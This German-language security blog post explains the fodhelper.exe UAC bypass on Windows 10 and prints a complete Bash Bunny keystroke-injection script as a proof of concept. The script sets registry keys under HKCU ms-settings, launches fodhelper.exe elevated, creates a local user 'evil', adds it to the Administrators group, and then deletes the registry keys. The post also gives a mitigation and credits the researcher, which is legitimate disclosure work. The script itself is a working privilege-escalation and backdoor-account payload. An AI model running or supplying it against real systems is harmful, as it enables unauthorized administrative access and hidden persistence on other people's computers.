Ein deutscher Student hat eine Variante des bereits im August 2016 vom Sicherheitsforscher Matt Nelson entdeckten UAC-Bypass-Methode veröffentlicht.
Während Nelsons Methode das eingebaute Event Viewer-Dienstprogramm (eventvwr.exe) verwendet, nutzt Christian die Datei fodhelper.exe für eine UAC-Bypass aus.
Was ist das eigentlich das Problem? Normalerweise werden Anwendungen in Windows 10 standardmäßig mit den Rechten eines normalen Benutzers ausgeführt. Wenn jedoch höhere Privilegien nötig sind, etwa um ein Setup-Programm auszuführen, verfügt die UAC über einen Auto-Elevation-Mechanismus, der die Rechte des Administrators bei Bedarf erhöht. Auto-Elevation funktioniert nur, wenn der angemeldete User prinzipiell Administrator ist. Meldet sich ein “normaler” Benutzer an, so gibt es ja im Hintergrund für diesen kein Admin-Token.
Microsoft nutzt dazu vertrauenswürdige Binärdateien, die an vertrauenswürdigen Orten wie z.B. in “C:\Windows\ System32” abgelegt sind.
Genau wie eventvwr.exe ist fodhelper.exe auch eine vertrauenswürdige Binärdatei, was bedeutet, dass in Windows 10 kein UAC-Fenster angezeigt wird, wenn das Programm gestartet wird oder wenn andere Prozesse aus dem fodhelper.exe-übergeordneten Prozess hervorgehen.
Christian legte in Windows 10 zwei Registrierungsschlüssel an, in denen er benutzerdefinierte Befehle integrierte. Nun konnten beim Start der Datei fodhelper.exe diese Befehle in einem höheren Kontext ausgeführt werden. Der Forscher hat den Beweis des Konzeptes (PoC) auf GitHub veröffentlicht. Um zu verhindern, dass Malware diese UAC-Bypass-Technik ausnutzt, empfiehlt er, dass Benutzer für ihr Standard-Windows-Profil kein Administratorenkonto nutzen.
Ich habe (als Proof of Concept) ein Skript für den Bash Bunny verfasst, dass die Registrierungsschlüssel anlegt, die Datei fodhelper.exe ausführt und mit daraus resultierenden höheren Rechten einen neuen Nutzer anlegt.
[code]
#!/bin/bash
# Title: fodhelperUACBypass Windows 10
# Author: Pentestit.de
# Version: 0.1
# Target: Windows 10
#
# Christian discovered that during the execution of the fodhelper.exe binary, Windows 10 would look at two registry keys
# for additional commands to execute when launching the file. He was able to edit the value of one of those registry keys
# and to pass on custom commands that would be executed in the elevated context of the fodhelper.exe file
# See https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/ for more information
#
# The current user has to be member of the local administrator group for this to work – OS Win 10
# This script is written for German Win 10 systems.
#
# Blue — Setup Registry keys
# Yellow — Start fodhelper.exe and add new user
# White — Clean up
# Green — Done
ATTACKMODE HID
Q SET_LANGUAGE de
# Create registry keys
LED B
Q DELAY 2000
Q GUI
Q DELAY 500
Q STRING powershell
Q ENTER
Q DELAY 5000
Q STRING New\-Item \-Path \”HKCU\:\\Software\\Classes\\ms-settings\\Shell\\Open\\command\” -\Value \”cmd \/c start powershell.exe\” \-Force
Q ENTER
Q DELAY 500
Q STRING New\-ItemProperty \-Path \”HKCU\:\\Software\\Classes\\ms-settings\\Shell\\Open\\command\” \-Name \”DelegateExecute\” \-Value \”\” \-Force
Q ENTER
Q DELAY 500
Q STRING Exit
Q ENTER
Q DELAY 5000
# Start Fodhelper.exe and add new user
LED Y
Q GUI
Q DELAY 200
Q STRING powershell Start-Process \”C\:\\Windows\\System32\\fodhelper.exe\”
Q ENTER
Q DELAY 10000
Q STRING net user evil evil /add
Q ENTER
Q DELAY 500
Q STRING net localgroup Administratoren evil /add
Q ENTER
Q DELAY 500
Q STRING Exit
Q ENTER
Q DELAY 200
# Clean up
LED W
Q GUI
Q DELAY 500
Q STRING powershell
Q ENTER
Q DELAY 5000
Q STRING Remove\-Item \”HKCU\:\\Software\\Classes\\ms\-settings\\\” \-Recurse \-Force
Q ENTER
Q STRING Exit
Q ENTER
# Done
LED G
[/code]
Hier das Video zum PoC: